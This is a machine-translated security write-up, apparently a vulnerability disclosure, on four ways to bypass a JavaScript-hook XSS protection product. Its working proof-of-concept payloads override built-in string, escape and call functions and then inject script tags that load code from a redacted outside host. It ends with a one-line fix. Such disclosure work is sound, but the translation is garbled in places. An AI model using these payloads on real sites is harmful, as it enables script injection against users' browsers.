Several bypass positions monitored by X-SS

Several bypass positions monitored by X-SS

The browser guard is based on the javascript hook mechanism to implement front-end xss protection. The product is very good and the performance is also good, but there are still some shortcomings.

Drops posted: http ://**. **. **. **/web/10636, found the nursing mirror to fix the problem, but still found some problems during the test.

The browser monitoring tool is based on the Js Hook Technology to monitor front-end pages and uses a large closure in the interception code. Therefore, we can only start with global variables and bypass them in hxj. min. js finally found protection for some functions:

The Object. defineProperty function is used to implement protection and cannot hijack these protected function objects.

1. No toLowerCase Protection

The Hook_Source module monitors external sources and performs the following logic during comparison:

ToLowerCase is used for conversion, but this function is not protected in the code, so toLowerCase is bypassed by hijacking.

(1) bypass code:

String. prototype. toLowerCase = function (e) {return 'shit' ;}; var s = document. createElement ('script'); s. src = 'HTTP ://**. **. **. **/R4p6BE2 '; document. body. appendChild (s) (2) test URL (the following example only shows the code ):

**. **/Browser/test. php? T = "; String. prototype. toLowerCase = function (e) {return 'shit' ;}; s = document. createElement ('script'); document. body. appendChild (s); s. src = 'HTTP ://**. **. **. **/R4p6BE2 '; // no alert is reported on the x-SS platform. 2. Use the Check_domain function to bypass

When you verify src, use Check_domain to check whether the URL in src belongs to the URL in the configured whitelist. Check the logic of this function:

The Code does not protect indexOf and replace, so the following two bypasses exist:

(1) hijack replace

Test code:

Var _ replace = String. prototype. replace; String. prototype. replace = function () {return "test";} s = document. createElement ('script'); document. body. appendChild (s); s. src = 'HTTP ://**. **. **. **/R4p6BE2 '; (2) chrome-extension: // domain is ignored in indexOfCheck_domain hijacking. The POC structure is as follows:

Var _ indexof = String. prototype. indexOf; String. prototype. indexOf = function (val) {if (val = 'chrome-extension: // ') {return 0;} return _ indexof. call (arguments);} s = document. createElement ('script'); document. body. appendChild (s); s. src = 'HTTP ://**. **. **. **/r4p6be2'; 3. The XSSTest module bypasses some test-type XSS such as alert and prompt, and can also bypass:

In the module, alert, confirm, and prompt are overwritten, and alarm operations are performed before the call, but escape is used for encoding. Go to the Report function and see:

The parameter e is determined, so we will overwrite escape. If null is returned forever, no alert will be triggered.

Window. escape = function () {return null;} window. escape = function () {return null ;}; s = document. createElement ('script'); document. body. appendChild (s); s. src = 'HTTP ://**. **. **. **/R4p6BE2 '; 4. Hijacking call fancy bypass in the care mirror Code. At last, hijacking calls the Native Interface through call, but does not implement object protection for apply/call itself, therefore, we can obtain the original interface through the hijacking call function. The Code is as follows:

Var w = window; var d = document; var _ call = Function. prototype. call; Function. prototype. call = function () {if (arguments. length = 0) {return;} if (this. name = 'createelement') {if (! W. _ create) {w. _ create = this ;}} if (this. name = 'setattribute') {if (! W. _ setAttribute) {w. _ setAttribute = this;} return _ call. apply (this, arguments);} s = d. createElement ('img '). src = '/X'; s = _ create. call (document, 'script'); Object. defineProperty (s, "src", {get: function () {return "chrome-extension: //" ;}, set: function (e) {_ setAttribute. call (s, 'src', e) ;}}); s. src = 'HTTP ://**. **. **. **/browser/edevil. js'; d. body. appendChild (s); here the trick is to call the original interface _ create to bypass the createElement And set/get the src of the script element to bypass the Check_domain function detection.

Solution:

Complete object protection.